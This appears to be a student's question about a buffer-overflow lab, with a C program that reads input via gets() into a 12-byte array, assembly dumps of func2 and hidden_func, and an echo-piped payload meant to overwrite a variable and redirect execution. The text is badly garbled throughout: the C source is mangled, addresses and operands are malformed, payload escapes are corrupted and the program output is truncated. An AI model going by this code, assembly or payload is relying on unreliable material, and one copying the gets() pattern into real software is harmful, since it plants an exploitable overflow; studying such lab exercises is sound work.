Buffer Overflow Attack: How do I print the pass value to be -12 and execute the hidden_func() for the C program below?

buffer1.c:

Assembly Code for fun2:

Assembly Code for hidden_func:

My Buffer Attack( It's printing pass value -12, but not printing the hidden func):

\#includestdio.h int func1() \{ printf("executing func1() "); return 1; \} int hidden_func( ) \{ printf("executing hidden_func () ") ); \}. int func2() \{ signed short pass =0; char arr[12]; gets(arr); printf("pass:\%d ", pass); puts (arr); return 0; \} int main () \{ func2(); return 0 ; \} \begin{tabular}{|c|c|c|c|} \hline 000000000004005e2 & +: & push & % rbp \\ \hline 000000000004005e3 & +1 & mov & %rsp,% rbp \\ \hline 000000000004005e6 & +4: & sub & $010,% rsp \\ \hline 000000000004005ea & +8 & movw & $,2(%rbp) \\ \hline 000000000004005f0 & +14: & lea & 1(% rbp), \%rax \\ \hline 000000000004005f4 & +18: & mov & % rax, \%rdi \\ \hline 000000000004005f7 & +21: & callq & 4004c \\ \hline 000000000004005fc & +26: & movswl & 2(% rbp), \%eax \\ \hline 00000000000400600 & +3: & mov & % eax,\%esi \\ \hline 00000000000400602 & +32: & mov & $04006fa,%edi \\ \hline 00000000000400607 & +37: & mov & $x,% eax \\ \hline 0000000000040060c & +42: & callq & 0400490 printf@plt> \\ \hline 00000000000400611 & +47 : & lea & 1(% rbp), % rax \\ \hline 00000000000400615 & +51: & mov & % rax, \%rdi \\ \hline 00000000000400618 & +54: & callq & 0400480 \\ \hline 0000000000040061d & +59: & mov & $x,% eax \\ \hline 00000000000400622 & +64: & leaveq & \\ \hline 00000000000400623 & +65: & retq & \\ \hline \end{tabular} End of assembler dump. Dump of assembler code for function hidden_func: 00000000004005d2+: push % rbp 000000000004005d3+1: mov % rsp, % rbp x00000000004005d6 : callq 0400480 000000000004005e+14 : pop \%rbp 000000000004005 e1 : retq End of assembler dump. I $ echo e"12345678123456\x+4\x+f\x+f\x+f\x+f\xc\x0012345678\xd2\x05\x40\x00\x00\x00\x0./bu+fer1 ass:-12 2345678123456 egmentation fault (core dumped)